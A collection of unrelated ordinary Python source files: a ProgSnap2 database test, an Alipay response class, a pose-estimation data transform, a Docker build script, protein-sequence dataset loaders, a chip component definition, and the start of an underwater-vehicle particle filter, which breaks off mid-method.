""" Check utilities.sorting """ import sys import os import unittest from pedal.utilities.progsnap import SqlProgSnap2 sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) here = "" if os.path.basename(os.getcwd()) == "tests" else "tests/" class TestProgsnap(unittest.TestCase): def test_progsnap_sort(self): progsnap = SqlProgSnap2(here+"datafiles/progsnap2_3.db") link_filters = { 'Subject': { 'X-IsStaff': "False", }, 'Assignment': { 'X-Name': "Fun%" }, } link_selections = { 'Subject': { 'X-Email': 'student_email', 'X-Name.First': 'student_first', 'X-Name.Last': 'student_last', }, 'Assignment': { 'X-Name': 'assignment_name', 'X-URL': 'assignment_url', 'X-Code.OnRun': 'on_run' } } fun_student_edits = progsnap.get_events( event_filter={'EventType': 'File.Edit'}, link_filters=link_filters, link_selections=link_selections ) self.assertEqual(212, len(fun_student_edits)) self.assertIsInstance(fun_student_edits[0], dict) self.assertEqual("592", fun_student_edits[0]['event_id']) if __name__ == '__main__': unittest.main(buffer=False)
#!/usr/bin/env python # -*- coding: utf-8 -*- import simplejson as json from alipay.aop.api.response.AlipayResponse import AlipayResponse from alipay.aop.api.domain.OpenBatch import OpenBatch class KoubeiQualityTestCloudacptBatchQueryResponse(AlipayResponse): def __init__(self): super(KoubeiQualityTestCloudacptBatchQueryResponse, self).__init__() self._activity_id = None self._batch_list = None self._batch_num = None @property def activity_id(self): return self._activity_id @activity_id.setter def activity_id(self, value): self._activity_id = value @property def batch_list(self): return self._batch_list @batch_list.setter def batch_list(self, value): if isinstance(value, list): self._batch_list = list() for i in value: if isinstance(i, OpenBatch): self._batch_list.append(i) else: self._batch_list.append(OpenBatch.from_alipay_dict(i)) @property def batch_num(self): return self._batch_num @batch_num.setter def batch_num(self, value): self._batch_num = value def parse_response_content(self, response_content): response = super(KoubeiQualityTestCloudacptBatchQueryResponse, self).parse_response_content(response_content) if 'activity_id' in response: self.activity_id = response['activity_id'] if 'batch_list' in response: self.batch_list = response['batch_list'] if 'batch_num' in response: self.batch_num = response['batch_num']
import math import random import cv2 import numpy as np import torch from ..bbox import _box_to_center_scale, _center_scale_to_box from ..transforms import (addDPG, affine_transform, flip_joints_3d, get_affine_transform, im_to_torch) class SimpleTransform(object): """Generation of cropped input person and pose heatmaps from SimplePose. Parameters ---------- img: torch.Tensor A tensor with shape: `(3, h, w)`. label: dict A dictionary with 4 keys: `bbox`: [xmin, ymin, xmax, ymax] `joints_3d`: numpy.ndarray with shape: (n_joints, 2), including position and visible flag `width`: image width `height`: image height dataset: The dataset to be transformed, must include `joint_pairs` property for flipping. scale_factor: int Scale augmentation. input_size: tuple Input image size, as (height, width). output_size: tuple Heatmap size, as (height, width). rot: int Ratation augmentation. train: bool True for training trasformation. """ def __init__(self, dataset, scale_factor, color_factor, occlusion, add_dpg, input_size, output_size, rot, sigma, train, loss_type='MSELoss', dict_output=False): self._joint_pairs = dataset.joint_pairs self._scale_factor = scale_factor self._color_factor = color_factor self._occlusion = occlusion self._rot = rot self._add_dpg = add_dpg self._input_size = input_size self._heatmap_size = output_size self._sigma = sigma self._train = train self._loss_type = loss_type self._aspect_ratio = float(input_size[1]) / input_size[0] # w / h self._feat_stride = np.array(input_size) / np.array(output_size) self.pixel_std = 1 self.dict_output = dict_output if train: self.num_joints_half_body = dataset.num_joints_half_body self.prob_half_body = dataset.prob_half_body self.upper_body_ids = dataset.upper_body_ids self.lower_body_ids = dataset.lower_body_ids def test_transform(self, src, bbox): xmin, ymin, xmax, ymax = bbox center, scale = _box_to_center_scale( xmin, ymin, xmax - xmin, ymax - ymin, self._aspect_ratio) scale = scale * 1.0 input_size = self._input_size inp_h, inp_w = input_size trans = get_affine_transform(center, scale, 0, [inp_w, inp_h]) img = cv2.warpAffine(src, trans, (int(inp_w), int(inp_h)), flags=cv2.INTER_LINEAR) bbox = _center_scale_to_box(center, scale) img = im_to_torch(img) # mean img[0].add_(-0.406) img[1].add_(-0.457) img[2].add_(-0.480) # std img[0].div_(0.225) img[1].div_(0.224) img[2].div_(0.229) return img, bbox def _target_generator(self, joints_3d, num_joints): target_weight = np.ones((num_joints, 1), dtype=np.float32) target_weight[:, 0] = joints_3d[:, 0, 1] target = np.zeros((num_joints, self._heatmap_size[0], self._heatmap_size[1]), dtype=np.float32) tmp_size = self._sigma * 3 for i in range(num_joints): mu_x = int(joints_3d[i, 0, 0] / self._feat_stride[0] + 0.5) mu_y = int(joints_3d[i, 1, 0] / self._feat_stride[1] + 0.5) # check if any part of the gaussian is in-bounds ul = [int(mu_x - tmp_size), int(mu_y - tmp_size)] br = [int(mu_x + tmp_size + 1), int(mu_y + tmp_size + 1)] if (ul[0] >= self._heatmap_size[1] or ul[1] >= self._heatmap_size[0] or br[0] < 0 or br[1] < 0): # return image as is target_weight[i] = 0 continue # generate gaussian size = 2 * tmp_size + 1 x = np.arange(0, size, 1, np.float32) y = x[:, np.newaxis] x0 = y0 = size // 2 # the gaussian is not normalized, we want the center value to be equal to 1 g = np.exp(-((x - x0) ** 2 + (y - y0) ** 2) / (2 * (self._sigma ** 2))) # usable gaussian range g_x = max(0, -ul[0]), min(br[0], self._heatmap_size[1]) - ul[0] g_y = max(0, -ul[1]), min(br[1], self._heatmap_size[0]) - ul[1] # image range img_x = max(0, ul[0]), min(br[0], self._heatmap_size[1]) img_y = max(0, ul[1]), min(br[1], self._heatmap_size[0]) v = target_weight[i] if v > 0.5: target[i, img_y[0]:img_y[1], img_x[0]:img_x[1]] = g[g_y[0]:g_y[1], g_x[0]:g_x[1]] return target, np.expand_dims(target_weight, -1) def _integral_target_generator(self, joints_3d, num_joints, patch_height, patch_width): target_weight = np.ones((num_joints, 2), dtype=np.float32) target_weight[:, 0] = joints_3d[:, 0, 1] target_weight[:, 1] = joints_3d[:, 0, 1] target = np.zeros((num_joints, 2), dtype=np.float32) target[:, 0] = joints_3d[:, 0, 0] / patch_width - 0.5 target[:, 1] = joints_3d[:, 1, 0] / patch_height - 0.5 target = target.reshape((-1)) target_weight = target_weight.reshape((-1)) return target, target_weight def __call__(self, src, label): if label['bbox'] is not None: bbox = list(label['bbox']) else: bbox = None gt_joints = label['joints_3d'] imgwidth, imght = label['width'], label['height'] assert imgwidth == src.shape[1] and imght == src.shape[0] self.num_joints = gt_joints.shape[0] joints_vis = np.zeros((self.num_joints, 1), dtype=np.float32) joints_vis[:, 0] = gt_joints[:, 0, 1] input_size = self._input_size if self._add_dpg and self._train: bbox = addDPG(bbox, imgwidth, imght) if bbox is not None: xmin, ymin, xmax, ymax = bbox center, scale = _box_to_center_scale( xmin, ymin, xmax - xmin, ymax - ymin, self._aspect_ratio) else: center = np.array([imgwidth / 2, imght / 2], dtype=np.float32) scale = np.array([imgwidth, imght], dtype=np.float32) # half body transform if self._train and (np.sum(joints_vis[:, 0]) > self.num_joints_half_body and np.random.rand() < self.prob_half_body): c_half_body, s_half_body = self.half_body_transform( gt_joints[:, :, 0], joints_vis ) if c_half_body is not None and s_half_body is not None: center, scale = c_half_body, s_half_body # rescale if self._train: sf = self._scale_factor scale = scale * np.clip(np.random.randn() * sf + 1, 1 - sf, 1 + sf) else: scale = scale * 1.0 # rotation if self._train: rf = self._rot r = np.clip(np.random.randn() * rf, -rf * 2, rf * 2) if random.random() <= 0.6 else 0 else: r = 0 if self._train and self._occlusion and bbox is not None: while True: area_min = 0.0 area_max = 0.7 synth_area = (random.random() * (area_max - area_min) + area_min) * (xmax - xmin) * (ymax - ymin) ratio_min = 0.3 ratio_max = 1 / 0.3 synth_ratio = (random.random() * (ratio_max - ratio_min) + ratio_min) synth_h = math.sqrt(synth_area * synth_ratio) synth_w = math.sqrt(synth_area / synth_ratio) synth_xmin = random.random() * ((xmax - xmin) - synth_w - 1) + xmin synth_ymin = random.random() * ((ymax - ymin) - synth_h - 1) + ymin if synth_xmin >= 0 and synth_ymin >= 0 and synth_xmin + synth_w < imgwidth and synth_ymin + synth_h < imght: synth_xmin = int(synth_xmin) synth_ymin = int(synth_ymin) synth_w = int(synth_w) synth_h = int(synth_h) src[synth_ymin:synth_ymin + synth_h, synth_xmin:synth_xmin + synth_w, :] = np.random.rand(synth_h, synth_w, 3) * 255 break joints = gt_joints if random.random() > 0.5 and self._train: # src, fliped = random_flip_image(src, px=0.5, py=0) # if fliped[0]: assert src.shape[2] == 3 src = src[:, ::-1, :] joints = flip_joints_3d(joints, imgwidth, self._joint_pairs) center[0] = imgwidth - center[0] - 1 inp_h, inp_w = input_size trans = get_affine_transform(center, scale, r, [inp_w, inp_h]) img = cv2.warpAffine(src, trans, (int(inp_w), int(inp_h)), flags=cv2.INTER_LINEAR) trans_inv = get_affine_transform(center, scale, r, [inp_w, inp_h], inv=True).astype(np.float32) intrinsic_param = np.zeros((3, 3)).astype(np.float32) joint_root = np.zeros((3)).astype(np.float32) depth_factor = np.array([2000]).astype(np.float32) # deal with joints visibility for i in range(self.num_joints): if joints[i, 0, 1] > 0.0: joints[i, 0:2, 0] = affine_transform(joints[i, 0:2, 0], trans) # generate training targets if self._loss_type == 'MSELoss': target, target_weight = self._target_generator(joints, self.num_joints) elif 'LocationLoss' in self._loss_type or 'L1Loss' in self._loss_type: target, target_weight = self._integral_target_generator(joints, self.num_joints, inp_h, inp_w) bbox = _center_scale_to_box(center, scale) assert img.shape[2] == 3 if self._train: c_high = 1 + self._color_factor c_low = 1 - self._color_factor img[:, :, 0] = np.clip(img[:, :, 0] * random.uniform(c_low, c_high), 0, 255) img[:, :, 1] = np.clip(img[:, :, 1] * random.uniform(c_low, c_high), 0, 255) img[:, :, 2] = np.clip(img[:, :, 2] * random.uniform(c_low, c_high), 0, 255) img = im_to_torch(img) # mean img[0].add_(-0.406) img[1].add_(-0.457) img[2].add_(-0.480) # std img[0].div_(0.225) img[1].div_(0.224) img[2].div_(0.229) if self.dict_output: output = { 'type': '2d_data', 'image': img, 'target': torch.from_numpy(target).float(), 'target_weight': torch.from_numpy(target_weight).float(), 'trans_inv': torch.from_numpy(trans_inv).float(), 'intrinsic_param': torch.from_numpy(intrinsic_param).float(), 'joint_root': torch.from_numpy(joint_root).float(), 'depth_factor': torch.from_numpy(depth_factor).float(), 'bbox': torch.Tensor(bbox) } return output else: return img, torch.from_numpy(target), torch.from_numpy(target_weight), torch.Tensor(bbox) def half_body_transform(self, joints, joints_vis): upper_joints = [] lower_joints = [] for joint_id in range(self.num_joints): if joints_vis[joint_id][0] > 0: if joint_id in self.upper_body_ids: upper_joints.append(joints[joint_id]) else: lower_joints.append(joints[joint_id]) if np.random.randn() < 0.5 and len(upper_joints) > 2: selected_joints = upper_joints else: selected_joints = lower_joints \ if len(lower_joints) > 2 else upper_joints if len(selected_joints) < 2: return None, None selected_joints = np.array(selected_joints, dtype=np.float32) center = selected_joints.mean(axis=0)[:2] left_top = np.amin(selected_joints, axis=0) right_bottom = np.amax(selected_joints, axis=0) w = right_bottom[0] - left_top[0] h = right_bottom[1] - left_top[1] if w > self._aspect_ratio * h: h = w * 1.0 / self._aspect_ratio elif w < self._aspect_ratio * h: w = h * self._aspect_ratio scale = np.array( [ w * 1.0 / self.pixel_std, h * 1.0 / self.pixel_std ], dtype=np.float32 ) scale = scale * 1.5 return center, scale
import docker import json import os import sys client = docker.from_env() print('Building base image...') client.images.build(path=os.getcwd(), tag='ann-benchmarks', rm=True, dockerfile='install/Dockerfile') def build(library): print('Building %s...' % library) try: client.images.build(path=os.getcwd(), tag='ann-benchmarks-%s' % library, rm=True, dockerfile='install/Dockerfile.%s' % library) except docker.errors.BuildError as err: print("Build error: {0}".format(err)) if os.getenv('LIBRARY'): build(os.getenv('LIBRARY')) else: for fn in os.listdir('install'): if fn.startswith('Dockerfile.'): build(fn.split('.')[-1])
from typing import Union from pathlib import Path import lmdb import subprocess import string import json import os from os import path import pickle as pkl from scipy.spatial.distance import squareform, pdist import numpy as np import torch from torch.utils.data import Dataset import pandas as pd from sequence_models.utils import Tokenizer from sequence_models.constants import trR_ALPHABET, DIST_BINS, PHI_BINS, THETA_BINS, OMEGA_BINS from sequence_models.gnn import bins_to_vals from sequence_models.pdb_utils import process_coords class LMDBDataset(Dataset): """Creates a dataset from an lmdb file. Args: data_file (Union[str, Path]): Path to lmdb file. in_memory (bool, optional): Whether to load the full dataset into memory. Default: False. """ def __init__(self, data_file: Union[str, Path], in_memory: bool = False): data_file = Path(data_file) if not data_file.exists(): raise FileNotFoundError(data_file) env = lmdb.open(str(data_file), max_readers=1, readonly=True, lock=False, readahead=False, meminit=False) with env.begin(write=False) as txn: num_examples = pkl.loads(txn.get(b'num_examples')) if in_memory: cache = [None] * num_examples self._cache = cache self._env = env self._in_memory = in_memory self._num_examples = num_examples def __len__(self) -> int: return self._num_examples def __getitem__(self, index: int): if not 0 <= index < self._num_examples: raise IndexError(index) if self._in_memory and self._cache[index] is not None: item = self._cache[index] else: with self._env.begin(write=False) as txn: item = pkl.loads(txn.get(str(index).encode())) if 'id' not in item: item['id'] = str(index) if self._in_memory: self._cache[index] = item return item class TAPEDataset(Dataset): def __init__(self, data_path: Union[str, Path], data_type: str, split: str, sub_type : str = 'distance', eps : float = 1e-6, in_memory: bool = False, max_len=700): """ data_path : path to data directory data_type : name of downstream task, [fluorescence, stability, remote_homology, secondary_structure, contact] split : data split to load contact_method : if data_type == contact, choose 'distance' to get distance instead of binary contact output """ self.data_type = data_type self.sub_type = sub_type self.eps = eps self.max_len = max_len if data_type == 'fluorescence': if split not in ('train', 'valid', 'test'): raise ValueError(f"Unrecognized split: {split}. " f"Must be one of ['train', 'valid', 'test']") data_file = Path(data_path + f'fluorescence_{split}.lmdb') self.output_label = 'log_fluorescence' if data_type == 'stability': if split not in ('train', 'valid', 'test'): raise ValueError(f"Unrecognized split: {split}. " f"Must be one of ['train', 'valid', 'test']") data_file = Path(data_path + f'stability_{split}.lmdb') self.output_label = 'stability_score' if data_type == 'remote_homology': if split not in ('train', 'valid', 'test_fold_holdout', 'test_family_holdout', 'test_superfamily_holdout'): raise ValueError(f"Unrecognized split: {split}. Must be one of " f"['train', 'valid', 'test_fold_holdout', " f"'test_family_holdout', 'test_superfamily_holdout']") data_file = Path(data_path + f'remote_homology_{split}.lmdb') self.output_label = 'fold_label' if data_type == 'secondary_structure': if split not in ('train', 'valid', 'casp12', 'ts115', 'cb513'): raise ValueError(f"Unrecognized split: {split}. Must be one of " f"['train', 'valid', 'casp12', " f"'ts115', 'cb513']") data_file = Path(data_path + f'secondary_structure_{split}.lmdb') if self.sub_type == 'ss8': self.output_label = 'ss8' else: self.output_label = 'ss3' if data_type == 'contact': if split not in ('train', 'train_unfiltered', 'valid', 'test'): raise ValueError(f"Unrecognized split: {split}. Must be one of " f"['train', 'train_unfiltered', 'valid', 'test']") data_file = Path(data_path + f'proteinnet_{split}.lmdb') self.output_label = 'tertiary' self.data = LMDBDataset(data_file, in_memory) def __len__(self) -> int: return len(self.data) def __getitem__(self, index: int): item = self.data[index] primary = item['primary'] mask = None if self.data_type in ['fluorescence', 'stability', ]: output = float(item[self.output_label][0]) if self.data_type in ['remote_homology']: output = item[self.output_label] diff = max(len(primary) - self.max_len + 1, 1) start = np.random.choice(diff) end = start + self.max_len primary = primary[start: end] if self.data_type in ['secondary_structure']: # pad with -1s because of cls/sep tokens output = torch.Tensor(item[self.output_label],).to(torch.int8) diff = max(len(primary) - self.max_len + 1, 1) start = np.random.choice(diff) end = start + self.max_len primary = primary[start: end] output = output[start:end] if self.data_type in ['contact']: # -1 is ignore, 0 in no contact, 1 is contact valid_mask = item['valid_mask'] distances = squareform(pdist(item[self.output_label])) yind, xind = np.indices(distances.shape) invalid_mask = ~(valid_mask[:, None] & valid_mask[None, :]) invalid_mask |= np.abs(yind - xind) < 6 if self.sub_type == 'distance': output = torch.tensor(np.exp(-distances ** 2 / 64)) else: contact_map = np.less(distances, 8.0).astype(np.int64) contact_map[invalid_mask] = -1 contact_map = torch.Tensor(contact_map).to(torch.int8) output = torch.tensor(contact_map) mask = torch.tensor(~invalid_mask) diff = max(len(primary) - self.max_len + 1, 1) start = np.random.choice(diff) end = start + self.max_len primary = primary[start: end] output = output[start:end, start:end] mask = mask[start:end, start:end] return primary, output, mask class CSVDataset(Dataset): def __init__(self, fpath=None, df=None, split=None, outputs=[], max_len=np.inf): if df is None: self.data = pd.read_csv(fpath) else: self.data = df if split is not None: self.data = self.data[self.data['split'] == split] self.outputs = outputs self.data = self.data[['sequence'] + self.outputs] self.max_len = max_len def __len__(self): return len(self.data) def __getitem__(self, idx): row = self.data.iloc[idx] sequence = row['sequence'] if len(sequence) > self.max_len: start = np.random.choice(len(sequence) - self.max_len) stop = start + self.max_len sequence = sequence[start:stop] return [sequence, *row[self.outputs]] class FlatDataset(Dataset): def __init__(self, fpath, offsets, cols=[1]): self.fpath = fpath self.offsets = offsets self.cols = cols def __len__(self): return len(self.offsets) def __getitem__(self, idx): with open(self.fpath, 'r') as f: f.seek(self.offsets[idx]) line = f.readline()[:-1] # strip the \n line = line.split(',') return [line[i] for i in self.cols] class FFDataset(Dataset): def __init__(self, stem, max_len=np.inf, tr_only=True): self.index = stem + 'ffindex' self.data = stem + 'ffdata' result = subprocess.run(['wc', '-l', self.index], stdout=subprocess.PIPE) self.length = int(result.stdout.decode('utf-8').split(' ')[0]) self.tokenizer = Tokenizer(trR_ALPHABET) self.table = str.maketrans(dict.fromkeys(string.ascii_lowercase)) self.max_len = max_len self.tr_only = tr_only def __len__(self): return self.length def __getitem__(self, idx): result = subprocess.run(['ffindex_get', self.data, self.index, '-n', str(idx + 1)], stdout=subprocess.PIPE) a3m = result.stdout.decode('utf-8') seqs = [] for line in a3m.split('\n'): # skip labels if len(line) == 0: continue if line[0] == '#': continue if line[0] != '>': # remove lowercase letters and right whitespaces s = line.rstrip().translate(self.table) if self.tr_only: s = ''.join([a if a in trR_ALPHABET else '-' for a in s]) if len(s) > self.max_len: return torch.tensor([]) seqs.append(s) seqs = torch.tensor([self.tokenizer.tokenize(s) for s in seqs]) return seqs def trr_bin(dist, omega, theta, phi): dist = torch.tensor(np.digitize(dist, DIST_BINS[1:]) % (len(DIST_BINS) - 1)) idx = np.where(omega == omega) jdx = np.where(omega[idx] < 0)[0] idx = tuple(i[jdx] for i in idx) omega[idx] = 2 * np.pi + omega[idx] omega = torch.tensor(np.digitize(omega, OMEGA_BINS[1:]) % (len(OMEGA_BINS) - 1)) idx = np.where(theta == theta) jdx = np.where(theta[idx] < 0)[0] idx = tuple(i[jdx] for i in idx) theta[idx] = 2 * np.pi + theta[idx] theta = torch.tensor(np.digitize(theta, THETA_BINS[1:]) % (len(THETA_BINS) - 1)) phi = torch.tensor(np.digitize(phi, PHI_BINS[1:]) % (len(PHI_BINS) - 1)) idx = torch.where(dist == 0) omega[idx] = 0 theta[idx] = 0 phi[idx] = 0 return dist, omega, theta, phi class UniRefDataset(Dataset): """ Dataset that pulls from UniRef/Uniclust downloads. The data folder should contain the following: - 'consensus.fasta': consensus sequences, no line breaks in sequences - 'splits.json': a dict with keys 'train', 'valid', and 'test' mapping to lists of indices - 'lengths_and_offsets.npz': byte offsets for the 'consensus.fasta' and sequence lengths """ def __init__(self, data_dir: str, split: str, structure=False, pdb=False, coords=False, bins=False, p_drop=0.0, max_len=2048): self.data_dir = data_dir self.split = split self.structure = structure self.coords = coords with open(data_dir + 'splits.json', 'r') as f: self.indices = json.load(f)[self.split] metadata = np.load(self.data_dir + 'lengths_and_offsets.npz') self.offsets = metadata['seq_offsets'] self.pdb = pdb self.bins = bins if self.pdb or self.bins: self.n_digits = 6 else: self.n_digits = 8 if self.coords: with open(data_dir + 'coords.pkl', 'rb') as f: self.structures = pkl.load(f) self.p_drop = p_drop self.max_len = max_len def __len__(self): return len(self.indices) def __getitem__(self, idx): idx = self.indices[idx] offset = self.offsets[idx] with open(self.data_dir + 'consensus.fasta') as f: f.seek(offset) consensus = f.readline()[:-1] if len(consensus) - self.max_len > 0: start = np.random.choice(len(consensus) - self.max_len) stop = start + self.max_len else: start = 0 stop = len(consensus) if self.coords: coords = self.structures[str(idx)] dist, omega, theta, phi = process_coords(coords) dist = torch.tensor(dist).float() omega = torch.tensor(omega).float() theta = torch.tensor(theta).float() phi = torch.tensor(phi).float() elif self.structure: sname = 'structures/{num:{fill}{width}}.npz'.format(num=idx, fill='0', width=self.n_digits) fname = self.data_dir + sname if path.isfile(fname): structure = np.load(fname) else: structure = None if structure is not None: if np.random.random() < self.p_drop: structure = None elif self.pdb: dist = torch.tensor(structure['dist']).float() omega = torch.tensor(structure['omega']).float() theta = torch.tensor(structure['theta']).float() phi = torch.tensor(structure['phi']).float() if self.bins: dist, omega, theta, phi = trr_bin(dist, omega, theta, phi) else: dist, omega, theta, phi = bins_to_vals(data=structure) if structure is None: dist, omega, theta, phi = bins_to_vals(L=len(consensus)) if self.structure or self.coords: consensus = consensus[start:stop] dist = dist[start:stop, start:stop] omega = omega[start:stop, start:stop] theta = theta[start:stop, start:stop] phi = phi[start:stop, start:stop] return consensus, dist, omega, theta, phi consensus = consensus[start:stop] return (consensus, ) class TRRDataset(Dataset): def __init__(self, data_dir, dataset, return_msa=True, bin=True, untokenize=False, max_len=2048): """ Args: data_dir: str, path to trRosetta data dataset: str, train, valid return_msa: bool return full MSA or single sequence bin: bool bin structure matrices tokenizer: Use this to untokenize sequence if desired """ filenames = data_dir + dataset + 'list.txt' self.filenames = np.loadtxt(filenames, dtype=str) self.data_dir = data_dir self.return_msa = return_msa self.bin = bin self.max_len = max_len if untokenize: self.tokenizer = Tokenizer(trR_ALPHABET) else: self.tokenizer = None def __len__(self): return len(self.filenames) def __getitem__(self, idx): filename = self.data_dir + 'npz/' + self.filenames[idx] + '.npz' data = np.load(filename) if self.return_msa: s = torch.tensor(data['msa']) ell = s.shape[1] else: s = data['msa'][0] if self.tokenizer is not None: s = self.tokenizer.untokenize(s) ell = len(s) if ell - self.max_len > 0: start = np.random.choice(ell - self.max_len) stop = start + self.max_len else: start = 0 stop = ell dist = data['dist6d'] omega = data['omega6d'] theta = data['theta6d'] phi = data['phi6d'] if self.return_msa: s = s[:, start:stop] else: s = s[start:stop] if self.bin: dist, omega, theta, phi = trr_bin(dist, omega, theta, phi) else: idx = np.where(dist == 0) dist[idx] = 20.0 dist = torch.tensor(dist).float() omega = torch.tensor(omega).float() theta = torch.tensor(theta).float() phi = torch.tensor(phi).float() dist = dist[start:stop, start:stop] omega = omega[start:stop, start:stop] theta = theta[start:stop, start:stop] phi = phi[start:stop, start:stop] return s, dist, omega, theta, phi class MSAGapDataset(Dataset): """Build dataset for trRosetta data: gap-prob and lm/mlm""" def __init__(self, data_dir, dataset, task, pdb=False, y=None, msa=None, random_seq=False, npz_dir=None, reweight=True, mask_endgaps=False): """ Args: data_dir: str, path to trRosetta data dataset: str, train, valid, or test task: str, gap-prob or lm pdb: bool, if True, return structure as inputs; if False, return random sequence if pdb is False, you must have task = gab-prob filtered_y: bool, if True, use gap probabilities from filtered MSA (task = gap-prob) or select sequence from filtered MSA (task = lm) if False, use unfiltered MSA Filtered is defined as removing sequences from MSA where gaps only exists on ends of sequences filtered_msa: bool, if True, use filtered msa; if False, use unfiltered msa npz_dir: str, if you have a specified npz directory pdb_dir: str, if you have a specified pdb directory """ filename = data_dir + dataset + 'list.txt' pdb_ids = np.loadtxt(filename, dtype=str) # choose to use specific msa or y instead of the prebuilt ones # should be in the order of npz_dir and in npy file self.msa_path = msa self.y_path = y # get data dir if npz_dir: self.npz_dir = npz_dir else: self.npz_dir = data_dir + 'structure/' all_npzs = os.listdir(self.npz_dir) selected_npzs = [i for i in pdb_ids if i + '.npz' in all_npzs] self.filenames = selected_npzs # ids of samples to include # X options self.pdb = pdb self.task = task self.random_seq = random_seq # special options for generating y values self.reweight = reweight self.mask_endgaps = mask_endgaps def __len__(self): return len(self.filenames) def __getitem__(self, idx): filename = self.filenames[idx] data = np.load(self.npz_dir + filename + '.npz') # grab sequence info if self.msa_path is not None: msa_data = np.load(self.msa_path + filename + ".npz") msa = msa_data['msa'] weights = msa_data['weights'] else: msa = data['msa'] weights = data['weights'] anchor_seq = msa[0] if self.random_seq: flag = True while flag: random_idx = np.random.randint(0, len(msa)) base_seq = msa[random_idx] if (base_seq == 20).sum()/len(base_seq) < 0.20: flag = False else: base_seq = anchor_seq # choose y type if self.y_path is not None: y_data = np.load(self.y_path + filename + 'npz') y = y_data['y'] y_mask = y_data['y_mask'] elif self.task == "gap-prob": if self.reweight: # downsampling y = ((msa == 20) * weights.T).sum(0)/msa.shape[0] y = torch.FloatTensor(y) else: y = torch.FloatTensor(np.sum(msa == 20, axis=0) / msa.shape[0]) y_mask = None else: # lm # y, y_mask = self._get_lm_y(msa) y = torch.LongTensor(base_seq) y_mask = None # choose X type if self.pdb: # use structure for X dist = torch.FloatTensor(data['dist']) omega = torch.FloatTensor(data['omega']) theta = torch.FloatTensor(data['theta']) phi = torch.FloatTensor(data['phi']) base_seq = torch.LongTensor(base_seq) anchor_seq = torch.LongTensor(anchor_seq) return base_seq, anchor_seq, dist, omega, theta, phi, y, y_mask else: # use just seq for X (THIS IS ONLY USED FOR GAP PROB) if self.task == "gap-prob": chosen = False while not chosen: msa_num = np.random.randint(msa.shape[0]) x = msa[msa_num] seq_mask = x != 20 # only want num of gap < 20% chosen = np.sum(seq_mask) / x.shape[0] > 0.8 x = torch.LongTensor(x) seq_mask = torch.BoolTensor(seq_mask) return x[seq_mask], y[seq_mask] else: raise ValueError("""Warning - input type and output type are not compatible, pdb=False can only be used with task gap-prob""") def _get_lm_y(self, msa): if self.mask_endgaps: y = torch.LongTensor(msa[np.random.choice(msa.shape[0])]) # get random seq from msa y_mask = [] for i in range(len(y)): if y[i] != 20: y_mask += [False] * (i) break for j in range(len(y) - 1, -1, -1): if y[j] != 20: y_mask += [True] * (j - i + 1) y_mask += [False] * (len(y) - 1 - j) break return y, torch.BoolTensor(y_mask) else: y = torch.LongTensor(msa[np.random.choice(msa.shape[0])]) # get random seq from msa y_mask = None return y, y_mask
# # Copyright (C) 2020 GreenWaves Technologies # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import gsystree as st class Apb_soc_ctrl(st.Component): def __init__(self, parent, name, soc): super(Apb_soc_ctrl, self).__init__(parent, name) self.add_properties({ 'vp_component': 'pulp.chips/gap9_v2/apb_soc_impl', 'cluster_power_event': soc.get_property('soc_events/soc_evt_cluster_pok'), 'cluster_clock_gate_event': soc.get_property('soc_events/soc_evt_cluster_cg_ok') }) self.add_properties(soc.get_property('peripherals/apb_soc_ctrl/config'))
from .alexa import AlexaResponse
# -*- coding: utf-8 -*- """ Copyright (c) 2020, University of Southampton All rights reserved. Licensed under the BSD 3-Clause License. See LICENSE.md file in the project root for full license information. """ import copy import math import numpy as np from numpy.random import randn, uniform from auv_nav.sensors import SyncedOrientationBodyVelocity from auv_nav.tools.interpolate import interpolate from oplab import Console # Particle Filter implementation using classes # TODO: multiprocessing or multithreading # TODO: port uncertainty calculation from Jim # TODO: use 3D gaussian models for USBL def gaussian_pdf(mu, sigma, x): num = -((mu - x) ** 2) / (sigma ** 2) / 2.0 den = math.sqrt(2.0 * math.pi * (sigma ** 2)) return math.exp(num) / den class Index: X = 0 Y = 1 Z = 2 ROLL = 3 PITCH = 4 YAW = 5 VX = 6 VY = 7 VZ = 8 ALT = 9 DIM = 10 class Particle: def __init__(self): # The real-valued time, in seconds, since some epoch self.time = None # A 11-dimensional state vector self.state = np.zeros((Index.DIM, 1), dtype=float) # The particle trajectory self.trajectory = [] self.trajectory_time = [] # The measured errors during PF self.trajectory_error = [] # Particle weight self.weight = None @property def eastings(self): return self.state[Index.Y, 0] @property def northings(self): return self.state[Index.X, 0] def __eq__(self, other): return self.weight == other.weight def __lt__(self, other): return self.weight < other.weight class UsblObservationModel: def __init__(self, usbl_noise_sigma_factor): # The measurement self.x = None self.y = None self.z = None self.std = None self.usbl_noise_sigma_factor = usbl_noise_sigma_factor def set_observation(self, value): self.x = value.northings self.y = value.eastings self.z = value.depth # TODO: Could we use a 3D Gaussian instead of a 1D? sigma = math.sqrt( value.northings_std ** 2 + value.eastings_std ** 2 + value.depth_std ** 2 ) self.std = self.usbl_noise_sigma_factor * sigma def measure(self, p): """ This is the main method of ObservationModel. It takes a state reference as argument and is supposed to extract the state's variables to compute an importance weight for the state. Define this method in your sub-class! @param state Reference to the state that has to be weightened. @return importance weight for the state (positive, non-zero value). """ weight = 1.0 if self.x is not None: dist = math.sqrt( (self.x - p.state[Index.X, 0]) ** 2 + (self.y - p.state[Index.Y, 0]) ** 2 + (self.z - p.state[Index.Z, 0]) ** 2 ) p.trajectory_error.append(dist) weight = gaussian_pdf(0, self.std, dist) return weight class DeadReckoningMovementModel: """ @class MovementModel @brief Interface for movement models for particle filters. The movement model in a particle filter defines how a particle's state changes over time. """ def __init__( self, sensors_std, dvl_noise_sigma_factor, imu_noise_sigma_factor ): self.sensors_std = sensors_std self.dvl_noise_sigma_factor = dvl_noise_sigma_factor self.imu_noise_sigma_factor = imu_noise_sigma_factor self.movement = np.zeros((Index.DIM, 1), dtype=float) def set_movement(self, value): self.movement[Index.Z, 0] = value.depth self.movement[Index.ROLL, 0] = value.roll * math.pi / 180.0 self.movement[Index.PITCH, 0] = value.pitch * math.pi / 180.0 self.movement[Index.YAW, 0] = value.yaw * math.pi / 180.0 self.movement[Index.VX, 0] = value.x_velocity self.movement[Index.VY, 0] = value.y_velocity self.movement[Index.VZ, 0] = value.z_velocity 